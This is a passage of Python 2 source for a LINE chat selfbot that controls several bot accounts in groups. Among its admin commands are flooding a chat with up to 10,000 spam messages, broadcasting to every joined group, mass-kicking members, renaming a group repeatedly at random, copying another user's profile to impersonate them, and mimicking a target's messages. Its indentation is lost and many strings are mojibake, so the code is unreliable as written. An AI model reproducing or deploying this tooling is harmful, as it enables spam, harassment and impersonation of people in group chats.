cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["@group id"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["@cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "@album removeat’" in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","@add on","@auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","@add off","@auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "@message change: " in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "@message add: " in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["@message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "@comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "@add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["コメント:オン","@comment on","@comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","@comment off","@comment:off","自動首é �留言:關"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["@comment","留言確�"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["@gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI2 gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZS3 gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZS4 gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@comment bl "]:
if msg.from_ in admin:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["@comment wl "]:
if msg.from_ in admin:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["@comment bl confirm"]:
if msg.from_ in admin:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["@Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["@Change clock"]:
if msg.from_ in admin:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["@Jam Update"]:
if msg.from_ in admin:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
elif msg.text == "@cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "SIDER")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "@nongol":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═════ON SIDER══════%s\n╠════════════════\n%s╠════════════════\n║Reading point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "aku lelah")
#-----------------------------------------------
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["@all join","@semua masuk","@pus"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
# ks.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# ka.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# kb.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# ko.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# ke.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# ku.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# G = cl.getGroup(msg.to)
# G.preventJoinByTicket = True
# cl.updateGroup(G)
print "Bot Complete"
G.preventJoinByTicket(G)
cl.updateGroup(G)
elif msg.text in ["@ZSI join"]:
if msg.form_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["@ZSI2 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["@ZSI3 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["@ZSI4 join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["@Bye all"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["@Bye2"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["@Bye3"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["@Bye4"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bot2 @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bot3 @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bot4 @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Tagall","kiwkiw","Kiwkiw","tagall"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-------------Fungsi Tag All Finish---------------#
#----------------Fungsi Banned Kick Target Start-----------------------#
elif msg.text in ["@Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
kk.sendText(msg.to,"Good Bye")
return
for jj in matched_list:
try:
klist=[ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "@Pembersihan" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Sweep this group","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[gid])
except:
ki.sendText(msg.to,"Group cleanse")
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
if targets not in Bots:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[gid])
except:
ki.sendText(msg.to,"Good bye") #ki.sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "@Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] executed"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets in Bots:
cl.sendText(msg.to,"Can't ban bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target locked.")
print "[Banned] success"
except:
ki.sendText(msg.to,"Target already in blacklist.")
#----------------Fungsi Banned User Target Finish-----------------------#
elif msg.text in ["@Reset","@reset"]:
if msg.from_ in admin:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Telah kembali semula")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Copy @" in msg.text:
if msg.toType == 2:
print "[Copy] OK"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendMessage(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendMessage(msg.to, "Success Copy profile ~")
except Exception as e:
print e
elif "@a1 copy @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Copy] OK"
_name = msg.text.replace("A1 Copy @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendMessage(msg.to, "Not Found...")
else:
for target in targets:
try:
ki.CloneContactProfile(target)
ki.sendMessage(msg.to, "Success Copy profile ~")
except Exception as e:
print e
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "@Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] executed"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Target not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target cleaned.")
print "[Unban] success"
except:
ki.sendText(msg.to,"There's no target in blacklist.")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-----------------------------------------------
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
if msg.from_ in admin:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
elif "@mimic:" in msg.text:
if msg.from_ in admin:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on")
else:
cl.sendText(msg.to,"Mimic already on")
if cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off")
else:
cl.sendText(msg.to,"Mimic already off")
elif "add:" in cmd:
target0 = msg.text.replace("Mimic:add:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed")
break
elif "del:" in cmd:
target0 = msg.text.replace("Mimic:del:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed!")
break
elif cmd == "ListTarget":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<Lit Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n->" + cl.getContact(mi_d).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal:" + total)
#---------------------Fungsi spam start--------------------------
elif "@spam change: " in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change: ","")
cl.sendText(msg.to,"spam changed")
elif "@spam add: " in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "@Spam: " in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam: ","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#-------------------Fungsi spam finish----------------------------
#-----------------------------------------------
elif "@spam " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#------------------------------------------------
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["@Up","@up","@Up Chat","@Up chat","@up chat","@Upchat","@upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"squared up!")
ki.sendText(msg.to,"squared up!")
kk.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
ki.sendText(msg.to,"squared up!")
kk.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!������")
ki.sendText(msg.to,"squared up!")
kk.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
ki.sendText(msg.to,"squared up!")
#-------------Fungsi Spam Finish-------------- #-------------Fungsi Broadcast Start------------#
elif "@Bc " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("@Bc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
elif "@bc " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("@bc ","")
ki.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["@list group"]:
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
#####gn = cl.getGroup(i).name
#--------------List Group------------
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["ZSIsay hi"]:
if msg.from_ in admin:
ki.sendText(msg.to,"Hi buddy Har Har")
kk.sendText(msg.to,"Hi buddy Har Har")
kc.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["assalamualaikum","Assalamualaikum","Assalamu 'alaikum","assalamu 'alaikum"]:
ki.sendText(msg.to,"Wa 'alaikum salam")
elif msg.text in ["ZSIsay pagi"]:
if msg.from_ in admin:
ki.sendText(msg.to,"Pagi Semua Har Har")
kk.sendText(msg.to,"Semangat Har Har")
kc.sendText(msg.to,"Jalani Aktifitasnya Har Har")
elif msg.text in ["ZSIsay bobo ah","Bobo dulu ah"]:
if msg.from_ in admin:
ki.sendText(msg.to,"Have a nice dream Har Har")
kk.sendText(msg.to,"Have a nice dream Har Har")
kc.sendText(msg.to,"Have a nice dream Har Har")
elif msg.text in ["#welcome"]:
if msg.from_ in admin:
ki.sendText(msg.to,"Selamat Bergabung di ZONA SMULE INDONESIA")
kk.sendText(msg.to,"Jangan lupa isi BIODATA di NOTE terus masukin SS SMULE nya di Album Smule")
kc.sendText(msg.to,"Jangan lupa absen tiap pagi pakai id smule yaa,, Moga betah!")
cl.sendText(msg.to,"Jangan nakal, ok!")
#-----------------------------------------------
elif msg.text in ["@PING","@Ping","@ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PING double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Respon","respon","Respon Dong","respon dong"]:
if msg.from_ in admin:
cl.sendText(msg.to,"...")
ki.sendText(msg.to,"......")
kk.sendText(msg.to,"..........")
kc.sendText(msg.to,"Complete 100%")
elif msg.text in ["Respon beb"]:
if msg.from_ in admin:
cl.sendText(msg.to,"Bab")
ki.sendText(msg.to,"Beb")
kk.sendText(msg.to,"Gundulmu")
kc.sendText(msg.to,"wkwkwk")
#-------------Fungsi Respon Finish---------------------#
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["@speed","@speedbot"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "▒▒▒▓▓▓LOAD 99%..")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("@bl " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["@ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["@unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#-------------Fungsi Banned Send Contact Finish------------------#
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["@banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"There's no banned user")
else:
ki.sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["@cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["@kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.sendText(msg.to,"Good bye.")
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
kk.kickoutFromGroup(msg.to,[jj])
kc.kickoutFromGroup(msg.to,[jj])
elif msg.text in ["@clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "@random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "@albumat'" in msg.text:
if msg.from_ in admin:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "@fakec��1�7�1�7" in msg.text:
if msg.from_ in admin:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakec��1�7�1�7","")
#cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Admin add executing"
